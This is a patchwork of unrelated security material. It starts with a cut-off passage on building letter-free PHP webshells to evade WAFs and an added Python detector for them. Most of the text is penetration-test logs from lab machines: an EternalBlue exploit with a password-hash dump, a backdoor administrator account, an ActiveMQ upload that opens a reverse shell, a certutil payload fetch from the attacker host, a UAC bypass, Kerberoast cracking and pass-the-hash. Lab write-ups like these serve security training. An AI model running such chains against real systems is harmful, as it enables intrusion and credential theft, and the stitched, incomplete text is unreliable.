To bypass a WAF, you can use several techniques to rewrite your webshell.
Idea
First, let me make the idea clear. The core idea is to start from characters that are neither letters nor digits, transform them in various ways, and end up able to construct any character in a-z. Then, using the fact that PHP allows dynamic function calls, splice together a function name such as "assert" and execute it dynamically.
So the transformation method is the main problem to solve.
But before that, I need to talk about the difference between PHP 5 and PHP 7.
In PHP 5, assert is a function, so we can use $f='assert';$f(...); to dynamically execute arbitrary code.
In PHP 7, assert is no longer a function but a language construct (similar to eval), so it cannot be called dynamically through a function name, and the technique is a little more complicated to use. There is no need to worry too much, though: a function such as file_put_contents can be used the same way to get a shell.
For convenience, PHP 5 is used as the environment; PHP 7 usage is left for readers to explore on their own.
Method 1
This is the simplest method and the easiest one to think of. In PHP, XORing two strings yields another string. So, to obtain a letter in a-z, we look for two characters that are neither letters nor digits whose XOR result is that letter.
PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.
So, how do we get a variable holding the string 'a'?
Specifically, the first letter of the string Array is an uppercase A and the fourth is a lowercase a. In other words, we can get both lowercase and uppercase A, and by incrementing them we can get every letter in a-z and A-Z.
In PHP, if an array is joined with a string, the array is converted to a string whose value is Array:
Then take the first character of that string, and you get 'A'.
Using this technique, I wrote the following webshell (because PHP function names are case insensitive, we end up executing ASSERT($_POST[_])):
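The same building blocks that the article uses to assemble a function name (XOR of single-character literals, an array coerced to the string "Array" and indexed, repeated ++ on the resulting letter, and a variable function call fed from $_POST) are also what a defender can look for in uploaded PHP. The following Python scanner is an added example written for this edit, not code from the original article; the two PHP samples it scans are constructed (the suspicious one is a deliberately incomplete fragment, not a working shell), and the 0.3 alphanumeric-ratio threshold and the scoring rule are assumptions to tune against your own code base.

```python
"""Heuristic detector for non-alphanumeric PHP webshells (added example, not the article's code)."""
import re

# Building blocks the article describes, expressed as patterns a reviewer or a
# file-upload scanner can grep for.
XOR_LITERAL = re.compile(r"""(['"])[^'"\\]\1\s*\^\s*(['"])[^'"\\]\2""")   # e.g. '#'^'@'
QUOTED_VAR = re.compile(r'"\$[A-Za-z_]\w*"')                             # "$_" coerces an array to "Array"
INCREMENT = re.compile(r"\+\+")                                          # 'A'++ -> 'B' -> ...
DYNAMIC_CALL = re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")

ALNUM_RATIO_THRESHOLD = 0.3   # assumption: tune against your own code base


def assess(source: str) -> dict:
    """Return the raw indicators and a verdict for one PHP source string."""
    body = source.replace("<?php", "", 1)
    compact = re.sub(r"\s+", "", body)
    alnum = sum(ch.isalnum() for ch in compact)
    ratio = alnum / len(compact) if compact else 1.0
    findings = {
        "xor_literals": len(XOR_LITERAL.findall(body)),
        "array_to_string": len(QUOTED_VAR.findall(body)),
        "increments": len(INCREMENT.findall(body)),
        "dynamic_call": DYNAMIC_CALL.search(body) is not None,
        "alnum_ratio": round(ratio, 2),
    }
    obfuscation_hits = (findings["xor_literals"] + findings["array_to_string"]
                        + findings["increments"])
    # Almost no letters or digits, combined with either the letter-building tricks or
    # a variable function call on request data, is the signature the article describes.
    findings["suspicious"] = ratio < ALNUM_RATIO_THRESHOLD and (
        obfuscation_hits >= 2 or findings["dynamic_call"])
    return findings


# Constructed samples (not from the page). The second is a deliberately incomplete
# fragment that only shows the indicators; it is not a working shell.
BENIGN_PHP = """<?php
function greet($name) { return "Hello, " . htmlspecialchars($name); }
echo greet($_GET['name'] ?? 'world');
"""

SUSPICIOUS_PHP = """<?php
$_=[];$_=@"$_";$_=$_['!'=='@'];$__=$_;$__++;$__++;
$_=('#'^'@').('%'^'@');$__($_POST[_]);
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PHP), ("suspicious", SUSPICIOUS_PHP)):
        print(label, assess(src))
```

The ratio check matters more than any single pattern: legitimate minified PHP still contains function and variable names, whereas a shell built this way is almost entirely punctuation. Run assess() over each uploaded file before it is written to a web-served directory, and treat a positive verdict as a reason to quarantine rather than to block outright, since the heuristics are tunable and not exact.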
# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242
Nmap scan report for 10.150.150.242
Host is up (0.031s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
# Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242
rhost => 10.150.150.242
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242
rhosts => 10.150.150.242
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.66.66.210:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 3660 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\users\Administrator.GNBUSCA-W054\desktop>whoami
whoami
nt authority\system
c:\users\Administrator.GNBUSCA-W054\desktop>
c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt
type FLAG34.txt
c2e9e102e55d5697ed2f9a7ea63708c1cc411b79
c:\Users\Administrator.GNBUSCA-W054\Desktop>
c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.
c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.
Connect with RDP:
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 10.150.150.69:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
Install Nmap-Vulners
To install the nmap-vulners script, first cd into the Nmap scripts directory:
cd /usr/share/nmap/scripts/
Then clone the nmap-vulners GitHub repository by typing the below command into a terminal. That's it for installing nmap-vulners; no configuration is required after installing it.
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run
[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >
flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962
However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
79/tcp open finger
80/tcp open http
105/tcp open csnet-ns
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp open microsoft-ds
554/tcp open rtsp
1883/tcp open mqtt
2224/tcp open efi-mg
2869/tcp open icslap
3306/tcp open mysql
5672/tcp open amqp
8009/tcp open ajp13
8080/tcp open http-proxy
8089/tcp open unknown
8161/tcp open patrol-snmp
10243/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49251/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
Next we browse to http://10.150.150.219:8161/ and are greeted with:
Welcome to the Apache ActiveMQ!
It has an msf exploit:
https://www.exploit-db.com/exploits/42283
msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options
Module options (exploit/windows/http/apache_activemq_traversal_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Windows Java
msf6 exploit(windows/http/apache_activemq_traversal_upload) > run
[*] Started reverse TCP handler on 10.66.66.210:4444
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100
C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user
C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32
Directory of c:\puck
08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free
c:\puck>
Start the listener, and then execute c:\puck>7777.exe
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.66.66.210:7777
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
c:\puck>7777.exe
7777.exe
c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100
c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter >
meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\puck>whoami
whoami
hollywood\user
c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter >
Background session 2? [y/N]
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.150.150.219 - Collecting local exploits for x86/windows...
[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)
msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
Roast
C:\Windows\system32>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16
